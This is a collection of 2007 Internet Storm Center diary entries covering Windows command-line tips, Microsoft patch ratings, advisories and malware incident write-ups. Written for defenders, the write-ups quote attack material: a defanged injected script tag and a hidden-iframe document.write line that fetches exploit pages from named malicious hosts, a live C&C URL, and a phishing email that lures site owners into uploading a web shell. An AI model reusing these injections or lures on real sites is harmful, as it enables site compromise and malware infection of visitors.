It’s become something of a ritual around here.  Whenever I’m Handler on Duty, I reinforce my ultimate goal of eliminating the Windows GUI from use by administrators and incident handlers by writing a tip or two for using the Windows command line.  One of the most frequent questions I get recently whenever I teach a SANS session on the Windows command line involves searching for files with a given name.  Suppose, for example, that you want to find the program wmic.exe in your directory structure.  There are two approaches I use:

First, you can change into a given directory that you want to search (such as C:\windows\system32), and then run the dir command appropriately:

C:\> cd c:\windows\system32
C:\> dir /s /b wmic.exe

The /s means that we want to recurse subdirectories.  The /b means that we want the bare form of output (which will omit the volume information, ., and .. from our listing).  When /b is used with /s, it will print out the full path to the item for which we search (context-specific command flags that change their behavior in light of other flags can be trouble for memorization, I admit).  The downside of doing this is that you have changed out of your current directory to do the search.

But, diligent readers Michael Wilson, Chris Wolf, and a reader desiring anonymity have pointed out that you can search for something without changing your current directory by running the command thusly:

C:\> dir /s /b c:\windows\system32\wmic.exe

It looks like this command would only find a wmic.exe if it is system32 itself, but it actually looks through system32 and all of its subdirectories, doing just what we want.  Pretty cool!  And, you don't lose your current directory in the process.

The second approach is to use the dir command again, but to scrape through its output using the find command, as in:

C:\> dir /s /b c:\windows\system32 | find “wmic.exe”

The first approach has better performance (because we are not scraping through Standard Out).

Oh, and another frequent question I get: How can I do a line count on the output of another command?  UNIX and Linux folks frequently use “wc –l” to count stuff…. How can we do this in Windows?  Suppose, for example, you wanted to count the number of files and subdirectories inside of c:\temp.  There is no wc command built in, but here is a method I use:

C:\> dir /b c:\temp | find /c /v “~~~”

The dir command gets a directory listing, in bare format (/b) of c:\temp.  I use the find command to count (/c) lines that DO NOT contain (/v) the string ~~~.  It would be very unusual to have that string, so it gives me a pretty accurate line count.  If you are really concerned about having such lines, you can run it without the /v and make sure the count is 0.  Also, you can recurse subdirectories using /s, as you might expect.  And, this technique can also be used to count other things, like the number of running processes called svchost.exe, using the tasklist command (built into Win XP Pro and 2003):

C:\> tasklist /fi “imagename eq svchost.exe” | find /c /v “~~~”

Don’t forget to subtract the appropriate number of column headers and footer lines from your output (in the case of tasklist, you have to subtract 3, because of the Column titles, the ===== under the columns, and an extra carriage return it puts at the end).   Attentive reader Chris Luhman mentioned that you can use the /nh option in tasklist to get it to omit the header (nh stands for no header).  Then, you'll only have to subtract one from the output.  It is an odd but recurring thing in Windows command line tools.  They often put an extra line at either the beginning or the end of their output.  I see this a lot with wmic.

Oh, and there are other things you can do with the line count method I've described above.  For example, to count the number of lines in your win.ini file, you can use the type command (the rough equivalent to the UNIX cat command):

c:\> type c:\windows\win.ini | find /c /v "~~~"

And the list goes on and on...

This is a rather contrived way of doing a line count, but it works very nicely for me.  If you know of a better way, using only built-in Windows commands, please let me know.

--Ed Skoudis
Handler on Duty


Published: 2007-02-13

Valentine card - be sure not to get more than what you expect

Every opportunity where people send each other cards is one of those times the bad folks out there try to do their thing.

Valentines day is no exception to that rule.

We can all try to educate users not to click on attachments that are unexpected or from unknown senders, but how is that going to meet up in real life against the possibility of a hot date with a secret admirer ?

We can try to tackle the problem with technology that scans incoming messages, removes executable content,  repetitive content (spam), etc. but signature based systems will leak exploits, repetition might not always be there and the first few will be passed on regardless and perhaps worst of all, users are generally willing to go through great lengths to get their price and work around extension based filtering.

We could also try to promote not sending media rich wishes. We can lead by example. Simple text in plain old ASCII will do the trick just as well as a 5 Mbyte powerpoint presentation, flash animation or even HTML email.

Anyway, make sure to have a happy February 14th without catching on of these:

Symantec: Trojan.PPDropper.G

Oh, yes it's likely using a fresh so called 0-day, so it seems we'll have more Office patches in a few months time.

With thanks to Juha-Matti for being the first to pointing it out to us. Thanks for some inspiration Steve.
Swa Frantzen -- NET2S


Published: 2007-02-13

uTorrent exploit public

uTorrent is -I'm told anyway- a popular bittorrent implementation.

It has a publicly available buffer overflow against it, and hence the vulnerability and publication of a matching exploit might cause significant additional risk to your machines/installed user base.

Corporate IT/security managers might -while at it- make sure they are in a position to knowingly allow tools on company owned machines that are mostly, if not exclusively, used for copyright infringements. I'd highly recommend a chat with your legal department on their view on the matter.

Yes, there are some genuine uses of peer to peer file sharing, but they are perhaps better handled when impossible to avoid by an exception or two in the policies.

Swa Frantzen -- NET2S


Published: 2007-02-13

Cisco IOS IPS vunerabilities

Cisco released details on vulnerabilities in IOS based IPS.

The vulnerabilities allow IPS evasion and DoS against the device. An upgrade of the IOS version is recommended.

See the Cisco bulletin for more details:

Swa Frantzen -- NET2S


Published: 2007-02-13

Microsoft Black Tuesday patches - February 2007

Overview of the February 2007 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS07-005 Remote code execution in Step-by-Step Interactive training, replaces MS05-031
Step-by-Step Interactive training

No known problems

KB 923723
No known exploits Important Important Less Urgent
MS07-006 Privilege elevation in Windows Shell, replaces MS06-045

No known problems

KB 928255
No known exploits
Important Important Less Urgent
MS07-007 Privilege elevation in Windows Image Acquisition
Image Acquisition

No known problems

KB 927802
No known exploits Critical Important Less Urgent
MS07-008 Remote code execution in HTML help Active-X

No known problems

KB 928843
Exploit expected to become public soon
Critical PATCH NOW
MS07-009 Remote code execution in Microsoft MDAC ActiveX
Workaround through a killbit, if you did not do that already: PATCH NOW
MDAC ActiveX

No known problems

KB 927779
Public exploits since Oct 24th, 2006 Critical Critical
MS07-010 Remote code execution in Microsoft Malware Protection Engine. This  will automatically update.
Microsoft malware protection

No known problems

KB 932135
No known exploits Critical Critical Critical
MS07-011 Remote code execution in Microsoft OLE dialog

No known problems

KB 926436
Exploit publicly available
Important Critical Important
MS07-012 Remote code execution in Microsoft Foundation Class
Microsoft Foundation Class

No known problems

KB 924667
No known exploits Important Critical Important
MS07-013 Remote code execution in RichEdit, also affects Mac OS X versions of office.

No known problems

KB 918118
No known exploits Important Critical Important
MS07-014 Multiple vulnerabilities in word leading to remote code execution, replaces MS06-060

No known problems

KB 929434
Actively used and publicly known exploits.
Critical PATCH NOW
MS07-015 Multiple vulnerabilities in Office lead to remote code execution, replaces MS06-062

No known problems

KB 932554
Actively exploited Critical PATCH NOW
MS07-016 Multiple vulnerabilities in Internet Explorer leading to remote code execution, replaces MS06-072

No known problems

KB 928090
Exploits expected to be released soon
Critical PATCH NOW

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- NET2S


Published: 2007-02-13

Y3K problems ?

I almost had a déjà-vu moment when I read: CVE-2007-0842
So time handling functions in Visual C++ 8.0 can't go beyond Jan 1st 3000, didn't the industry learn almost a decade ago that dates move on and building any arbitrary limit is a bad idea(tm).

To add injury to the insult it's not that it returns something indicating it can't handle a date that far in the future, but just throws up an exception and terminates the application, causing opportunity for causing a DoS.

Swa Frantzen -- NET2S.com


Published: 2007-02-12

New Java update (1.5.0u11) and a Microsoft Word 2000 vulnerability

Sun recently released (another) update for Java 1.5.0, Update 11. There are a bunch of bug fixes and I didn’t see anything serious related to security.
However, it is worth noting that this update contains time zone data that incorporates Day Light Saving changes for 2007 (we wrote about this previously, http://isc.sans.org/diary.html?storyid=2142, but will use another opportunity to remind you about the changes).
Java update should be available automatically now as well – just remember to remove the old update revisions if you don’t need them any more (after you’ve thoroughly tested all your applications, of course).

McAfee published information about a new 0-day exploit for Word. They’ve notified Microsoft and it looks like the vulnerability is limited to Denial of Service. We’ve updated the list of 0-days in Microsoft products which you can find here: http://isc.sans.org/diary.html?storyid=1940.


Published: 2007-02-12

Encrypted malware and code reusability

About 3 weeks ago, one of our readers, Andrew, submitted a very interesting malicious binary. Andrew did some analysis himself and told us that he found encrypted files and some certificates which immediately caused interest amongst handlers.
If you are regularly reading ISC, you probably read the diary I wrote back in January about unsophisticated malware (http://isc.sans.org/diary.html?storyid=2022). Well, this time, things were completely different.

Initial analysis by Andrew showed that the machine was infected with a VML exploit. A small binary is dropped on the infected machine which, in this case, was a bit more than a typical downloader.

The analysis of unknown malicious programs can be a very difficult task. The first step in any analysis is to determine if the binary is packed or not. PEiD (http://peid.has.it), a tool I mentioned in the previous diary quickly determined that the binary was packed with UPX. UPX is a very common packer that is easy to unpack – various utilities exist that can help you with unpacking UPX and even doing it manually is very simple.

Once the binary was unpacked, you will typically want to run the strings command on the unpacked code, to see if there is anything that you can determine quickly by manually inspecting strings result.
The following two lines looked very interesting:

inflate 1.2.3 Copyright 1995-2005 Mark Adler
unzip 1.01 Copyright 1998-2004 Gilles Vollant - http://www.winimage.com/zLibDll

It looks like our malware has been linked with zLibDll, an open source ZLIB compression library. This also explained what Andrew was seeing as he said that a password protected ZIP file was downloaded by the downloader. A quick search of potential passwords did not result in anything so we concluded that the binary must either generate the password with some code, or download it from the Internet. In this case, the second assumption was correct.

Now we come to the most interesting (and difficult part). You could, of course, manually analyze disassembled malware code (IDA Pro is of great help here, if you can afford it), but an easier approach (in my opinion) is to run the downloader through a debugger and carefully watch what it is doing. The debugger of my choice is, of course, OllyDbg (http://www.ollydbg.de), which is the best free debugger for Windows operating system.
In order to debug a program you will need x86 assembly knowledge, so this would be a good time to refresh it (or read some books about it).

The debugging process is relatively simple: you load a file into the debugger, and execute it step by step while carefully watching what’s going on.
The downloader in question did the usual stuff. After copying itself into C:\Documents And Settings\All Users folder, it opened a HTTP connection to the control Web server:

http://ijk [dot] cc/cgi-bin/ [REMOVED] oadfile=q/q2_started_ok
(the site is still up)
Once it registered properly, the downloader downloaded a file called qa.zip, which was the password protected ZIP archive.
Now came the interesting bit. By stepping through the binary with the debugger, we were able to determine the password used to protect the archive. You can see how it is slowly appearing in the EDI register (the real password is much longer which makes brute forcing the ZIP archive difficult). A method similar to this one is always used when a malware generates a password programmatically – it will either keep it in one of the registers or somewhere in the memory.


Knowing the password it is easy to extract the ZIP archive now and as the standard ZIP format was used this can be done even with a standalone ZIP program.

The archive contained some interesting binaries:

$ ls -l
total 144
drwxr-xr-x 2 test test 4096 Jan 10 19:57 .
drwxr-xr-x 4 test test 4096 Feb 12 14:05 ..
-rw-r--r-- 1 test test 1505 Aug 10 2005 cert.pem
-rw-r--r-- 1 test test 692 Jan 8 09:49 crontab.cb
-rw-r--r-- 1 test test 432 Jan 8 09:49 _qbot.cb
-rw-r--r-- 1 test test 96768 Jan 8 09:30 _qbot.dll
-rw-r--r-- 1 test test 20480 Dec 29 08:19 _qbotinj.exe
-rw-r--r-- 1 test test 600 Jan 8 09:49 updates.cb

Casual inspection of files did not show much and we concluded that all the .cb files were encrypted (or obfuscated) as they had purely binary contents. The cert.pem file was obviously used as some kind of a certificate to encrypt something. So we continued with the debugging of the main downloader.

After some time spent on it, the part that decrypted the *.cb files was executed. It was a simple obfuscation function. Typically in cases like this what most analysts do is write a perl program that does the same thing so you can decrypt the files without running the malware.
The file contents were pretty obvious – updates.cb contained list of URLs to update from and _qbot.cb contained information about the C&C IRC servers.

The last thing that puzzled us was the certificate – what was it used for? The answer was in the _qbot.dll file. This file contains the main IRC bot, that is injected in another process and executed. Analyzing this file revealed that it was linked with another package (this time commercial), called MatrixSSL. MatrixSSL is a library by PeerSec Networks (http://www.peersec.com/matrixssl.html) that allows application to support SSL/TLS. This was obviously used by the malware to encrypt its network communication. In this case, the cert.pem file was used to connect to the IRC C&C server and encrypt the session, so network IDS tools would not see any commands issued to the bot.

As most anti virus analysts already saw, malware authors often reuse their code. It’s not strange to see code from one malware family used in another. This case showed us that malware authors are happy to use open source or even commercial packages that can help them. And they treat their programs as full blown projects, as one string from the bots binary confirmed: J:\projects\qbot\matrixssl\src\matrixSsl.c.

Finally, the AV detection on submitted files is still very bad, even weeks after it has been released. The original downloader was detected by only a handful of AV programs, while the second stage (real bot) was detected by only 3 programs. It is clear that you can not rely only on the AV program and that you should have defense in depth. In this case, blocking outgoing TCP traffic would at least prevent the bot from contacting the C&C server and doing more harm on your internal network.


Published: 2007-02-12

* Another good reason to stop using telnet

There is a major zero day bug announced in solaris 10 and 11 with the telnet and login combination.
It has been verified. In my opinion NOBODY be should running telnet open to the internet.
The issue:
The telnet daemon passes switches directly to the login process which looks for a switch that allows root to login to any account without a password. If your telnet daemon is running as root it allows unauthenticated remote logins.

Telnet should be disabled. Since 1994 the cert.org team has recommended using something other then plain text authentication due to potential network monitoring attacks. http://www.cert.org/advisories/CA-1994-01.html
“We recognize that the only effective long-term solution to prevent these attacks is by not transmitting reusable clear-text passwords on the network.“

If remote shell access is required ssh is a better choice then telnet. We have done articles about securing ssh in the past. http://isc.sans.org/diary.html?storyid=1541

The FIX:
To disable telnet in solaris 10 or 11 this command should work.
svcadm disable telnet

The Mitigations:
Limit your exposure if you must run telnet on your solaris system it is recommend that you use firewall(s) to limit what IP can connect to your telnet services.

Another mitigation that works is this:
inetadm -m svc:/network/telnet:default exec="/usr/sbin/in.telnetd -a user"

I am not going to include the site with the exploit. No special tools are required to exploit this vulnerability.

Thanks to Chris and Thomas who notified us of this issue and all the fellow handlers that helped verify, mitigate and review this report.


Published: 2007-02-11


Megel, A Internet Storm Center contributor, alerted us to a new German spam with a file that claims to be a PDF but is really a downloader. He started seeing this file arrive via email friday AM.
The message is basically an “thank you for your order read the pdf enclosed for details” type message. Not very original or new but it must work or the hackers would quit using this approach.

Original text from one sample messege:

Guten Tag,
Vielen Dank fur Ihre Bestellung!
Die von Ihnen bestellten Waren sind vollstandig am Lager und werden umgehend
durch die Logistikabteilung an Sie versandt.
Im Anhang finden Sie Ihr(en) Angebot/Auftrag im PDF-Format mit Beleg Nr.
Offnen Sie angefugte PDF-Dateien mit Acrobat Reader. Diesen konnen Sie unter
http://www.adobe.de/products/acrobat/readstep2.html kostenlos herunterladen.
Um eine schnellstmogliche Bearbeitung Ihre Ruckfragen gewahrleisten zu
bitten wir Sie bei Ruckfragen immer Ihre Kundennummer 77316 und
Belegnummer [3816712] anzugeben.

Vielen Dank
Mit freundlichem Grub
Eberhard Schmidt
TMS Logistik GmbH

Call Center:
tel (0180) 31 57 16 21 - 0,09 EUR/min aus dem dt. Festnetz/T-Com
fax (030) 90 16 - 29 19
web www.tms-logistik.de

Niederlassung Berlin
Albrechstrasse 117
D-01271 Berlin
Auf den Punkt gebracht - Ihre Vorteile als TMS Logistik Kunde

o 14 Tage Ruckgaberecht fur originalverpackte Neuware
o Beratung durch unsere Fachverkaufer
o Transparente Preisgestaltung und Verfugbarkeitsanzeige
o Rundumschutz durch optionales Servicepaket
o Kostenfreie Parkplatze
o Bequeme Zusendung durch uns oder DHL moglich
o Kostenfreier 80-seitiger Gesamtkatalog - auch per Post nach Hause
TMS Logistik - seit 12 Jahren erfolgreich in Berlin

Results from virustotal show its detected by some AV but mostly generically as some type of downloader.

AntiVir 02.09.2007 TR/Dldr.iBill.L
Authentium 4.93.8 02.09.2007 W32/Downloader.BBAV
Avast 4.7.936.0 02.11.2007 no virus found
AVG 386 02.10.2007 Generic3.SE
BitDefender 7.2 02.11.2007 no virus found
CAT-QuickHeal 9.00 02.09.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.11.2007 Trojan.Downloader-1405
DrWeb 4.33 02.11.2007 Trojan.DownLoader.18372
eSafe 02.09.2007 no virus found
eTrust-Vet 30.4.3384 02.10.2007 no virus found
Ewido 4.0 02.11.2007 no virus found
Fortinet 02.11.2007 DwnLdr.GAI!tr
F-Prot 02.09.2007 W32/Downloader.BBAV
F-Secure 6.70.13030.0 02.10.2007 Trojan-Downloader.Win32.Nurech.aj
Ikarus T3.1.0.31 02.11.2007 Trojan-Downloader.Win32.BBAV
Kaspersky 02.11.2007 Trojan-Downloader.Win32.Nurech.aj
McAfee 4960 02.09.2007 New Win32
Microsoft 1.2204 02.11.2007 no virus found
NOD32v2 2052 02.11.2007 no virus found
Norman 5.80.02 02.09.2007 no virus found
Panda 02.11.2007 Suspicious file
Prevx1 V2 02.11.2007 no virus found
Sophos 4.13.0 02.08.2007 no virus found
Sunbelt 2.2.907.0 02.09.2007 VIPRE.Suspicious
Symantec 10 02.11.2007 no virus found
TheHacker 02.11.2007 Trojan/Downloader.Nurech.aj
UNA 1.83 02.09.2007 no virus found
VBA32 3.11.2 02.10.2007 no virus found
VirusBuster 4.3.19:9 02.10.2007 no virus found

Aditional Information
File size: 8522 bytes
MD5: 5da184f16450d90b4c4fbec26d559130
SHA1: 16e5b73c82baad5a765123133ef87707e311d8da
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics


Published: 2007-02-11

Decoding Diyer’s Ascii bypass:

A user wrote in that he was seeing some exploit sites using the ""cooldiyer" ascii encoding for web filtering bypass.
The user’s question was how can I decode these?

Thanks to DanielW another handler we have an answer.
“This one is very straight forward to decode - all you have to do is convert it into 7bit ASCII or clear the highest bit with some Perl-Fu like cat gamefile.htm | perl -pe 's/(.)/chr(ord($1)&127)/ge'.
This is what they do with the HTML line above the code block as well (charset US-ASCII is 7bit). The decoded URL is a plain ordinary MS.XMLHTTP exploit which tries to download svc.exe but this file is no longer there”

I do want to warn users sites using this are mostly BAD sites with malware and exploits on them. Be very careful about any sites you find using this as they could have an exploit for your webbrowser/OS that you have no defenses against.


Published: 2007-02-10

SIP Packets Reload IOS Devices with support for SIP

Cisco has updated its security advisory on the recent issue on some affected version of Cisco IOS can be crashed by certain crafted SIP packets destined to port 5060. The issue is compounded by a related bug which allows traffic to TCP 5060 and UDP port 5060 on devices not configured for SIP.

Cisco reported that there are data streams that could appear to be unintentionally triggering the vulnerability as well.



Published: 2007-02-09

Security Guard Script e-mail scam

There is a spam making the rounds that is targetting customers of ISPs. The template of the e-mail is attached below and the attackers are using some sort of method to specifically mention the proper ISP name being used by the victim.  In short, it's trying to get you to upload scripts to your webserver and run them.  So far, the reverse engineering is ongoing, but it is obfuscated PHP or ASP code that will run once you go that page.

So far, I've seen that it sends an email to firstbts@gmail.com and tries to get a 0-byte file from  I'm create a VMware image to continue to reverse engineer, but these e-mails are scams of the typical social engineering variety. It seems most Anti-Virus picks this up already.


Dear <<insert ISP name here>> valued members

Regarding our new security regulations, as a part of our yearly maintenance we have provided a security guard script in the attachment.

So, to secure your websites, please use the attached file and (for UNIX/Linux Based servers) upload the file "guard.php" in: "./public_html" or (for Windows Based servers which use ASP) upload the file "guard.asp" in: "./wwwroot" in your site.

If you do not know how to use it, you can use the following instruction:

For Unix/Linux based websites that use PHP/CGI/PERL:
1) Download the attachment named "guard.zip"
2) Extract file "guard.php"
3) Login to your site Control panel.
4) Open "File Manager" window.
5) Go through "Public_html" or "htdocs"
6) Choose "Upload Files"
7) Upload the file "guard.php"
8) Check its URL too "http://www.yoursite.com/guard.php", if it is ok

For Windows based websites that use ASP:
1) Download the attachment named "guard.zip"
2) Extract file "guard.asp"
3) Login to your site Control panel.
4) Open "File Manager" window.
5) Go through "wwwroot" directory
6) Choose "Upload Files"
7) Upload the file "guard.asp"
8) Check its URL too "http://www.yoursite.com/guard.asp", if it is ok

Thank you for using our services and products. We look forward to providing you with a unique and high quality service.

Best Regards
<<insert ISP name here>>


John Bambenek, bambenek/at/gmail/dot/com
University of Illinois


Published: 2007-02-09

A Case of Identity Theft

ISC reader Aaron sent along a story in the News Tribune in Tacoma, WA. In short, it's the case of a serial identity thief who never got arrested but stole money from someone who is friends with a reporter. (Don't mess with journalists or their friends, oops. :) It's a pretty good read and a decent case study on ID theft and on the limitations in actually bringing these people to justice.

In this case, the identity theft took place because the individual involved had physical access to the victim's mail (it was a roommate). Right now, most identity theft takes place using non-technological means (i.e. dumpster diving). However, I still posit that electronic ID theft is not only dangerous, it is more dangerous. It takes time and effort to steal someone's identity in person. Online, with the right piece of malware and a good infection vector, you can steal thousands of identities in seconds. The only protection that is provided to consumers (at least in the United States) that I have been able to discern is that the existing fraud models limit the amount of money stolen by a particular attacker. Of course, risk management models allow companies to predict the amount of loss due to ID theft and pass it back down to the consumer in the form of increased prices. One day, someone will be smart enough to figure out how to bypass the fraud models.

It doesn't help that in the United States we have a weak national ID that easy to steal (we call it a Social Security Number). Getting that number makes everything else easy. It certainly doesn't help that organizations like the US Department of Education use SSNs for authentication, making it easy for keyloggers to steal them. SSNs as authentication are stupid... once you know the 9 digit number the game is over. Keyloggers and other malware has successfully compromised (this is different from actually stealing all the money) about $55 billion in US assets alone (an increase from my earlier estimate).

In short, protect your identity as best you can, from both physical and electronic theft.

John Bambenek, bambenek/at/gmail/dot/com
University of Illinois


Published: 2007-02-09

PHP 5.2.1 released

PHP.net released their version 5.2.1 which contains a number of security fixes.
"The majority of the security vulnerabilities discovered and resolved can in most cases be only abused by local users and cannot be triggered remotely. However, some of the above issues can be triggered remotely in certain situations, or exploited by malicious local users on shared hosting setups utilizing PHP as an Apache module. Therefore, we strongly advise all users of PHP, regardless of the version to upgrade to 5.2.1 release as soon as possible. PHP 4.4.5 with equivalent security corrections will be available shortly."

(BTW: Since you will have to recompile/test PHP anyway, take a look at security extensions from the hardened php project at www.hardened-php.net/ (in particular 'Suhosin' is nice and not too hard to install and configure)

Swa Frantzen -- net2s.com


Published: 2007-02-08

Where is Cameroon ?

Where Cameroon is?  Well, only a small typo away!  A reader today alerted us to the fact that "google.cm" is not your trusty search engine, but rather ... something else. Currently, the link leads to kinda a mock-up of a search tool named "Agoga" that appears to make money from displaying paid-for ad content. On first sight, we didn't find anything malicious lurking on the Agoga pages, but this could well change anytime (meaning: go there at your own risk).  In fact, and surprisingly enough, everything dot-cm ends up on that selfsame site. Yes, Cameroon registry is running a DNS wildcard right at the top level domain. Think phisher's paradise -- onlinebank.cm, myspace.cm, paypal.cm, anyone ?   If you haven't got legitimate business with firms in Cameroon, you might want to consider making your internal DNS server authoritative for .cm and return until the Cameroon registry deigns to rectify this sorry state of affairs.  Agoga.com seems to be owned by a company "Netview Inc" in Vancouver, BC.


Published: 2007-02-08

Happy Patch Tuesday ahead

Microsoft Patch Tuesday is coming up, and we'll get a bounty again this time. Twelve patches in total, with most of them rated at a lofty "critical" as usual. Yum.


Published: 2007-02-08

New MSN worm in Asia

Thomas writes in to report a new worm making the rounds over MSN in Asia.  Message content something like "Heeey! I found a picture of you online, take a look".  Sites implicated so far (where the binary comes from) are viotagallery-dot-com and modelosunica-dot-com.  AV coverage leaky still.


Published: 2007-02-08

TrendMicro Anti-Virus vulnerability

A buffer overflow vulnerability in the UPX parser of TrendMicro Antivirus seems to affect the product pretty much in all its incarnations. See esupport.trendmicro.com/support/viewxml.do   According to this, applying the latest pattern is sufficient to plug the problem until a new version of the engine (8.5) gets released.  Chances are though that the trend (no pun intended) will continue that AV products themselves contain the same type of  vulnerabilities they claim to shield other software against. Quis custodiet ipsos custodes ?


Published: 2007-02-07

Found: Possible Vector for Superbowl Websites Malicious JavaScript Insertion

We've received information that the likely common vector for how the web sites were compromised appears to be through the use of Dreamweaver.

There is not a flaw in Dreamweaver that was exploited.  It was a case of lazy programming on the parts of site developers who did not do a good job of "input validation" so attackers were able to do "sql injection" attacks.


Published: 2007-02-06

Attack on DNS root servers

The various wire services and various astute ISC readers have pointed out the news of the attacks against the DNS root servers.  We are aware of the attacks, and have been waiting to wade through the FUD before publishing anything more concrete.  I am posting this now just to let our readers know that we are aware of the story and that we are trying to get more information about it.  If you have any more information (logs, packets, or if you actually run one of the tld roots) please drop us a line.

The main story is featured here:


There are some graphs showing the traffic rates to the root servers here:


Mike Poor


Published: 2007-02-06

Internet Explorer msxml3 concurrency problems: update

The CVE-2007-0099 vulnerability has a potential for remote code execution that could make it much more critical than a plain DoS problem as demonstrated by the publicly known exploit.

In our interactions we have been led to believe that the remote code execution vector is too hard to control to be of any practical use to the hackers. Therefore we updated our overview table to reflect a Less Urgent need to act on it.

Swa Frantzen -- net2s.com


Published: 2007-02-06

more code injection sites 8.js

We have discovered more defacements / code-injection similar to the superbowl site defacement.
If you google for script 8.js you will find that 1.js and 3 .js were not the only java script’s used in this fashion. This version appears to have been targeted a bit at gaming sites although there is a few medical sites including an “anonymous expert HIV/AIDS counseling” site with this defacement.

Why am I calling this a defacement?
Because that is what we called it in the past when a bad guy gained access to portions of a website and replaced or added their own content to the website. The concept of a website having additional content or having portions of the content replaced was usually looked at as embarrassing but not a major threat. In my opinion with the recent trend to perform “silent defacements” with malicious code injection, world writable content areas should be treated as a threat.

The only malicious version of 8.js I have seen so far is hosted on www.001yl.com

<skript scr=hxxp://www.001yl.c0m/8.js></skript>

The stuff I pulled from www.001y.com is very similar to the 3.js defacement we discussed in the dolphinstadium site write-ups.

8.js uses a hidden iframe to hide its reference to qq.htm
document.write('<iframe src="hxxp://www.zj5173.com/qq.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>');

qq.htm uses several hidden iframes to call happy1.htm, happy2.htm, happy3.htm from www.001yl.com , h.js from www.zj5173.com and a counter at s102.cnzz.com.

Each happy1.htm (and 2 and 3) had pointers to http://www.zj5173.com/2.exe

h.js injects http://www.zj5173.com/3.js into a cookie.
3.js uses another hidden iframe to call hxxp://www.zj5173.com/1.htm
1.htm uses a VML overflow from www.hackwm.com to run some shell code.

2.exe is not currently well detected the virus scanning engines at virus total:

Antivirus Version Update Result
AntiVir 02.06.2007 TR/PSW.16132
Authentium 4.93.8 02.06.2007 W32/Downloader.gen10
Avast 4.7.936.0 02.05.2007 no virus found
AVG 386 02.05.2007 no virus found
BitDefender 7.2 02.05.2007 DeepScan:Generic.PWS.WoW.911CB0F4
CAT-QuickHeal 9.00 02.05.2007 (Suspicious) - DNAScan
ClamAV devel-20060426 02.05.2007 no virus found
DrWeb 4.33 02.05.2007 no virus found
eSafe 02.05.2007 suspicious Trojan/Worm
eTrust-InoculateIT 30.4.3371 02.05.2007 no virus found
eTrust-Vet 30.4.3371 02.05.2007 Win32/Gumbsumb!generic
Ewido 4.0 02.05.2007 no virus found
Fortinet 02.06.2007 no virus found
F-Prot 02.05.2007 W32/Downloader.gen10
Ikarus T3.1.0.31 02.06.2007 Generic.PWS.WoW
Kaspersky 02.06.2007 no virus found
McAfee 4956 02.05.2007 no virus found
Microsoft 1.2101 02.06.2007 no virus found
NOD32v2 2039 02.06.2007 no virus found
Norman 5.80.02 02.05.2007 no virus found
Panda 02.06.2007 no virus found
Prevx1 V2 02.06.2007 no virus found
Sophos 4.13.0 02.05.2007 no virus found
Sunbelt 2.2.907.0 02.02.2007 VIPRE.Suspicious
Symantec 10 02.06.2007 no virus found
TheHacker 02.05.2007 no virus found
UNA 1.83 02.05.2007 no virus found
VBA32 3.11.2 02.05.2007 suspected of Malware.Agent.36 (paranoid heuristics)
VirusBuster 4.3.19:9 02.05.2007 no virus found

Aditional Information
File size: 16132 bytes
MD5: ab2528881a3107463e13322fa31ecc4c
SHA1: 0fa0b4469f7765112e167f07a61954aeec7b1373
packers: UPX
packers: UPX, embedded
Sunbelt info: VIPRE.Suspicious is a generic detection

A NORMAN run shows this binary does some very suspicious stuff to a system.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)

[ General information ]
* Decompressing UPX.
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 16132 bytes.
* MD5 hash: ab2528881a3107463e13322fa31ecc4c.

[ Changes to filesystem ]
* Deletes file C:\WINDOWS\system32\bdscheca001.dll.
* Creates file C:\WINDOWS\system32\bdscheca001.dll.
* Deletes file C:\WINDOWS\system32\drivers\etc\Hosts.

[ Changes to system settings ]
* Creates WindowsHook monitoring messages activity.

[ Signature Scanning ]
* C:\WINDOWS\system32\bdscheca001.dll (11524 bytes) : no signature detection.

(C) 2004-2006 Norman ASA. All Rights Reserved.

1.htm appears to be a fairly well recognized Iframe exploit.
From virustotal:::

Antivirus Version Update Result
AntiVir 02.06.2007 JS/Dldr.Small.CR.2
Authentium 4.93.8 02.06.2007 HTML/IFrameBoF@expl
Avast 4.7.936.0 02.06.2007 no virus found
AVG 386 02.06.2007 no virus found
BitDefender 7.2 02.05.2007 Trojan.Downloader.JS.SetSlice.B
CAT-QuickHeal 9.00 02.06.2007 no virus found
ClamAV devel-20060426 02.06.2007 Exploit.HTML.IFrameBOF-4
DrWeb 4.33 02.06.2007 Trojan.DownLoader.18179
eSafe 02.06.2007 no virus found
eTrust-InoculateIT 30.4.3372 02.06.2007 no virus found
eTrust-Vet 30.4.3372 02.06.2007 JS/Veemyfull!exploit
Ewido 4.0 02.06.2007 Not-A-Virus.Exploit.HTML.IframeBof
Fortinet 02.06.2007 no virus found
F-Prot 02.06.2007 HTML/IFrameBoF@e
Ikarus T3.1.0.31 02.06.2007 Exploit.HTML.IframeBof
Kaspersky 02.06.2007 Exploit.HTML.IframeBof
McAfee 4957 02.06.2007 JS/Exploit-BO.gen
Microsoft 1.2101 02.06.2007 TrojanDownloader:JS/SetSlice
NOD32v2 2041 02.06.2007 no virus found
Norman 5.80.02 02.06.2007 no virus found
Panda 02.06.2007 no virus found

File size: 10776 bytes
